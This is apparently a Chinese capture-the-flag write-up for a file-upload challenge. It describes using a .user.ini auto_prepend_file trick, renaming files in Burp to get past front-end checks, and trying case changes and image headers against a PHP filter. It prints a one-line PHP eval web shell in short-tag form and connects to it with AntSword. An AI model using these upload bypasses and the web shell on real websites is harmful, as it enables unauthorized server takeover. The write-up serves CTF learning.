本题跟上一题一样先上传一个.user.ini文件文件内容是auto_prepend_file一句话木马将文件名改为.user.ini.png是为了绕过前端验证用bp抓包后需要把文件名改回为.user.ini防止因修改后缀名导致错误上传成功后将包含一句话木马的文件也上传到该网站尝试修改一句话木马将 ?php eval($_POST[attack]);?改为?phP eval($_POST[attack]);?使用大写来绕过限制说明此时有更严格的校验我们尝试给文件加上一个图片的文件头发现也失败了是因为本题php被过滤了但其实做法跟上题差不多需要注意的是再编写一个短输出标签方便绕过php形式的一句话木马shortmuma.php替换为?eval($_POST[attack]); ? 现在发现成功上传现在就可以尝试使用蚁剑连接连接成功拿到flag